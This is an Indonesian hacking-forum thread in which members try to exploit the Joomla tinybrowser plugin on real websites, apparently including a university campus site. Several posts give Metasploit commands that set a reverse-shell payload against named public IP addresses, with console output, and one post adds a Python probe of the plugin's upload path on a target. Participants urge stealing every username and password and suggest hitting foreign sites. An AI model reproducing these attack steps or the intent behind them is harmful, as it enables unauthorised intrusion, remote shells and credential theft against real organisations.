ASK TENTANG JOOMSCAN.PL
#21
ada yg curcol .... huahahahah ... ntar d coba ya, mudah"an sbagai bahan pembelajaran Smile
Quote:SayapHitam@bt:~# apt-get install evil-package
SayapHitam@bt:~# === SAYAP HITAM was Installed ===

#22
(03-28-2012, 01:09 AM)wine trochanter Wrote:
(03-25-2012, 09:32 PM)junior.riau18 Wrote: hei ini website nya kampus wine trochunter wkwkw jangan dihajar ya kesiaaan Smile

hajarrrr aja dapatin pass n username semuanya,wkwkwkkw
ane lakukan ini buat pengetahuan dan kebaikan angkatan ku,soalnya apa kasihan kalo remed byar nya mahalllllllll terus mereka juga pelit,dan mempersulit para mahasiswanya #pengalaman ane Big Grin

FK unissula angkatan berapa om???

#23
(03-28-2012, 04:36 AM)diampoleng Wrote:
(03-28-2012, 01:09 AM)wine trochanter Wrote:
(03-25-2012, 09:32 PM)junior.riau18 Wrote: hei ini website nya kampus wine trochunter wkwkw jangan dihajar ya kesiaaan Smile

hajarrrr aja dapatin pass n username semuanya,wkwkwkkw
ane lakukan ini buat pengetahuan dan kebaikan angkatan ku,soalnya apa kasihan kalo remed byar nya mahalllllllll terus mereka juga pelit,dan mempersulit para mahasiswanya #pengalaman ane Big Grin

FK unissula angkatan berapa om???

jiahhh ada syp,bhya ni
(03-25-2012, 08:13 PM)konspirasi Wrote:
(03-25-2012, 07:20 PM)fake666 Wrote: jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..

jalankan msfconsole, trus:
Code:
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST [MY IP ADDRESS]
msf exploit(joomla_tinybrowser) > set RHOST [TARGET IP]
msf exploit(joomla_tinybrowser) > exploit

ganti payload pake yg lain jg bisa, tergantung OS server sama aplikasi webnya

ayo dicoba, tapi jangan website dalam negeri ya Tongue

omm mau tanya ada tulisan gini knpa yah?
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)

msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf exploit(joomla_tinybrowser) > set RHOST 202.91.8.164
RHOST => 202.91.8.164
msf exploit(joomla_tinybrowser) > exploit

[*] Started reverse handler on 10.10.14.13:4444
[-] Error retrieving obfuscation code!
msf exploit(joomla_tinybrowser) >
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#24
(03-28-2012, 01:33 PM)wine trochanter Wrote:
(03-28-2012, 04:36 AM)diampoleng Wrote:
(03-28-2012, 01:09 AM)wine trochanter Wrote:
(03-25-2012, 09:32 PM)junior.riau18 Wrote: hei ini website nya kampus wine trochunter wkwkw jangan dihajar ya kesiaaan Smile

hajarrrr aja dapatin pass n username semuanya,wkwkwkkw
ane lakukan ini buat pengetahuan dan kebaikan angkatan ku,soalnya apa kasihan kalo remed byar nya mahalllllllll terus mereka juga pelit,dan mempersulit para mahasiswanya #pengalaman ane Big Grin

FK unissula angkatan berapa om???

jiahhh ada syp,bhya ni
(03-25-2012, 08:13 PM)konspirasi Wrote:
(03-25-2012, 07:20 PM)fake666 Wrote: jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..

jalankan msfconsole, trus:
Code:
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST [MY IP ADDRESS]
msf exploit(joomla_tinybrowser) > set RHOST [TARGET IP]
msf exploit(joomla_tinybrowser) > exploit

ganti payload pake yg lain jg bisa, tergantung OS server sama aplikasi webnya

ayo dicoba, tapi jangan website dalam negeri ya Tongue

omm mau tanya ada tulisan gini knpa yah?
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)

msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf exploit(joomla_tinybrowser) > set RHOST 202.91.8.164
RHOST => 202.91.8.164
msf exploit(joomla_tinybrowser) > exploit

[*] Started reverse handler on 10.10.14.13:4444
[-] Error retrieving obfuscation code!
msf exploit(joomla_tinybrowser) >

kayaknya ga vulner deh om Tongue menurut ane kalo salah mungkin bisa dibetulkan
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#25
(03-28-2012, 01:33 PM)wine trochanter Wrote:
(03-28-2012, 04:36 AM)diampoleng Wrote:
(03-28-2012, 01:09 AM)wine trochanter Wrote:
(03-25-2012, 09:32 PM)junior.riau18 Wrote: hei ini website nya kampus wine trochunter wkwkw jangan dihajar ya kesiaaan Smile

hajarrrr aja dapatin pass n username semuanya,wkwkwkkw
ane lakukan ini buat pengetahuan dan kebaikan angkatan ku,soalnya apa kasihan kalo remed byar nya mahalllllllll terus mereka juga pelit,dan mempersulit para mahasiswanya #pengalaman ane Big Grin

FK unissula angkatan berapa om???

jiahhh ada syp,bhya ni
(03-25-2012, 08:13 PM)konspirasi Wrote:
(03-25-2012, 07:20 PM)fake666 Wrote: jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..

jalankan msfconsole, trus:
Code:
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST [MY IP ADDRESS]
msf exploit(joomla_tinybrowser) > set RHOST [TARGET IP]
msf exploit(joomla_tinybrowser) > exploit

ganti payload pake yg lain jg bisa, tergantung OS server sama aplikasi webnya

ayo dicoba, tapi jangan website dalam negeri ya Tongue

omm mau tanya ada tulisan gini knpa yah?
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)

msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf exploit(joomla_tinybrowser) > set RHOST 202.91.8.164
RHOST => 202.91.8.164
msf exploit(joomla_tinybrowser) > exploit

[*] Started reverse handler on 10.10.14.13:4444
[-] Error retrieving obfuscation code!
msf exploit(joomla_tinybrowser) >

Om, tinybrowser itu kan masuknya plugin..
Nah sekarang tinggal di analisis aja, kira2 ada rule2 tertentu ga'..
Siapa aja yang bisa mengakses plugin itu kalau bisa public ya bisa di exploit..
Atau mungkin settingan di joomlanya tidak default misal di url bukan defaultnya, kalau ini harus di tune lagi di metasploitnya..
Atau kalau tidak di exploit manual saja, tinggal ngikutin aja step dari coding yg ada di metasploitnya..

#26
Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
php/bind_perl_ipv6 normal PHP Command Shell, Bind TCP (via perl) IPv6

msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(joomla_tinybrowser) > set RHOST 202.67.13.139
RHOST => 202.67.13.139
msf exploit(joomla_tinybrowser) > exploit

[*] Started reverse handler on 192.168.1.101:4444
[-] Exploit exception: The connection was refused by the remote host (202.67.13.139:80).
msf exploit(joomla_tinybrowser) >

kalo gitu kenapa ya?
apakah di block sama av atau firewall nya?
eh maaf saya salah om==
itu servernya windows ane make exploit yang unix maaf om
<< back|track'ers newbee

#27
ngeri..ijin nyimak om

#28
(03-28-2012, 05:49 PM)diampoleng Wrote:
(03-28-2012, 01:33 PM)wine trochanter Wrote:
(03-28-2012, 04:36 AM)diampoleng Wrote:
(03-28-2012, 01:09 AM)wine trochanter Wrote:
(03-25-2012, 09:32 PM)junior.riau18 Wrote: hei ini website nya kampus wine trochunter wkwkw jangan dihajar ya kesiaaan Smile

hajarrrr aja dapatin pass n username semuanya,wkwkwkkw
ane lakukan ini buat pengetahuan dan kebaikan angkatan ku,soalnya apa kasihan kalo remed byar nya mahalllllllll terus mereka juga pelit,dan mempersulit para mahasiswanya #pengalaman ane Big Grin

FK unissula angkatan berapa om???

jiahhh ada syp,bhya ni
(03-25-2012, 08:13 PM)konspirasi Wrote:
(03-25-2012, 07:20 PM)fake666 Wrote: jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..

jalankan msfconsole, trus:
Code:
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST [MY IP ADDRESS]
msf exploit(joomla_tinybrowser) > set RHOST [TARGET IP]
msf exploit(joomla_tinybrowser) > exploit

ganti payload pake yg lain jg bisa, tergantung OS server sama aplikasi webnya

ayo dicoba, tapi jangan website dalam negeri ya Tongue

omm mau tanya ada tulisan gini knpa yah?
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)

msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf exploit(joomla_tinybrowser) > set RHOST 202.91.8.164
RHOST => 202.91.8.164
msf exploit(joomla_tinybrowser) > exploit

[*] Started reverse handler on 10.10.14.13:4444
[-] Error retrieving obfuscation code!
msf exploit(joomla_tinybrowser) >

Om, tinybrowser itu kan masuknya plugin..
Nah sekarang tinggal di analisis aja, kira2 ada rule2 tertentu ga'..
Siapa aja yang bisa mengakses plugin itu kalau bisa public ya bisa di exploit..
Atau mungkin settingan di joomlanya tidak default misal di url bukan defaultnya, kalau ini harus di tune lagi di metasploitnya..
Atau kalau tidak di exploit manual saja, tinggal ngikutin aja step dari coding yg ada di metasploitnya..

wkwkkwkw
sumpah ane bingung
hadehhh otak pas pasan nih
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#29
(03-28-2012, 01:33 PM)wine trochanter Wrote:
(03-28-2012, 04:36 AM)diampoleng Wrote:
(03-28-2012, 01:09 AM)wine trochanter Wrote:
(03-25-2012, 09:32 PM)junior.riau18 Wrote: hei ini website nya kampus wine trochunter wkwkw jangan dihajar ya kesiaaan Smile

hajarrrr aja dapatin pass n username semuanya,wkwkwkkw
ane lakukan ini buat pengetahuan dan kebaikan angkatan ku,soalnya apa kasihan kalo remed byar nya mahalllllllll terus mereka juga pelit,dan mempersulit para mahasiswanya #pengalaman ane Big Grin

FK unissula angkatan berapa om???

jiahhh ada syp,bhya ni
(03-25-2012, 08:13 PM)konspirasi Wrote:
(03-25-2012, 07:20 PM)fake666 Wrote: jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..

jalankan msfconsole, trus:
Code:
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST [MY IP ADDRESS]
msf exploit(joomla_tinybrowser) > set RHOST [TARGET IP]
msf exploit(joomla_tinybrowser) > exploit

ganti payload pake yg lain jg bisa, tergantung OS server sama aplikasi webnya

ayo dicoba, tapi jangan website dalam negeri ya Tongue

omm mau tanya ada tulisan gini knpa yah?
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)

msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf exploit(joomla_tinybrowser) > set RHOST 202.91.8.164
RHOST => 202.91.8.164
msf exploit(joomla_tinybrowser) > exploit

[*] Started reverse handler on 10.10.14.13:4444
[-] Error retrieving obfuscation code!
msf exploit(joomla_tinybrowser) >

sama nih ama yang ini..
itu kenapa ya om?
<< back|track'ers newbee

#30
(03-28-2012, 10:17 PM)wine trochanter Wrote:
(03-28-2012, 05:49 PM)diampoleng Wrote:
(03-28-2012, 01:33 PM)wine trochanter Wrote:
(03-28-2012, 04:36 AM)diampoleng Wrote:
(03-28-2012, 01:09 AM)wine trochanter Wrote: hajarrrr aja dapatin pass n username semuanya,wkwkwkkw
ane lakukan ini buat pengetahuan dan kebaikan angkatan ku,soalnya apa kasihan kalo remed byar nya mahalllllllll terus mereka juga pelit,dan mempersulit para mahasiswanya #pengalaman ane Big Grin

FK unissula angkatan berapa om???

jiahhh ada syp,bhya ni
(03-25-2012, 08:13 PM)konspirasi Wrote:
(03-25-2012, 07:20 PM)fake666 Wrote: jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..

jalankan msfconsole, trus:
Code:
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST [MY IP ADDRESS]
msf exploit(joomla_tinybrowser) > set RHOST [TARGET IP]
msf exploit(joomla_tinybrowser) > exploit

ganti payload pake yg lain jg bisa, tergantung OS server sama aplikasi webnya

ayo dicoba, tapi jangan website dalam negeri ya Tongue

omm mau tanya ada tulisan gini knpa yah?
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)

msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf exploit(joomla_tinybrowser) > set RHOST 202.91.8.164
RHOST => 202.91.8.164
msf exploit(joomla_tinybrowser) > exploit

[*] Started reverse handler on 10.10.14.13:4444
[-] Error retrieving obfuscation code!
msf exploit(joomla_tinybrowser) >

Om, tinybrowser itu kan masuknya plugin..
Nah sekarang tinggal di analisis aja, kira2 ada rule2 tertentu ga'..
Siapa aja yang bisa mengakses plugin itu kalau bisa public ya bisa di exploit..
Atau mungkin settingan di joomlanya tidak default misal di url bukan defaultnya, kalau ini harus di tune lagi di metasploitnya..
Atau kalau tidak di exploit manual saja, tinggal ngikutin aja step dari coding yg ada di metasploitnya..

wkwkkwkw
sumpah ane bingung
hadehhh otak pas pasan nih

Kalau kita baca coding metasploitnya adalah :

URI = Joomla directory path (defaultnya di host:80) kalau misalkan letak web joomlanya tidak default maka harus di set dulu di option metasploit.
tinybrowserpath = '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/'


# Get obfuscation code (needed to upload files)
karena saat akan melakukan exploit metasploit terlebih dahulu melakukan request untuk mendapatkan obfuscation code.

yaitu request "datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='"

Apabila statusnya "Successfully retrieved obfuscation code" maka akan dilanjutkan ke tahap selanjutnya ya itu uploading shell.

nah karena untuk case ini status "Error retrieving obfuscation code!" maka program stop sampai excute listing ini karena obfuscation code tidak berhasil di dapat. Dan tidak dilanjutkan ke tahap exploit.



Kenapa tidak mendapatkan obfuscation code??

Ok, kalau kita coba request path url plugin tiny browsernya kira2 apa responnya:

#python cekresponse.py

==================================================
#!/path/to/python
import httplib

httpServ = httplib.HTTPConnection("202.91.8.164", 80)
httpServ.connect()

httpServ.request('GET', "/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php")

response = httpServ.getresponse()
printText (response.read())
===================================================


Respon saat kita coba request adalah "Restricted access"

Jadi dalam kata lain kita tidak di ijinkan untuk mengakses plugin tinybrowser.



Begitu penjelasannya kalau menurut saya.

Untuk teman-teman mohon dikoreksi apabila saya salah.






Users browsing this thread: 2 Guest(s)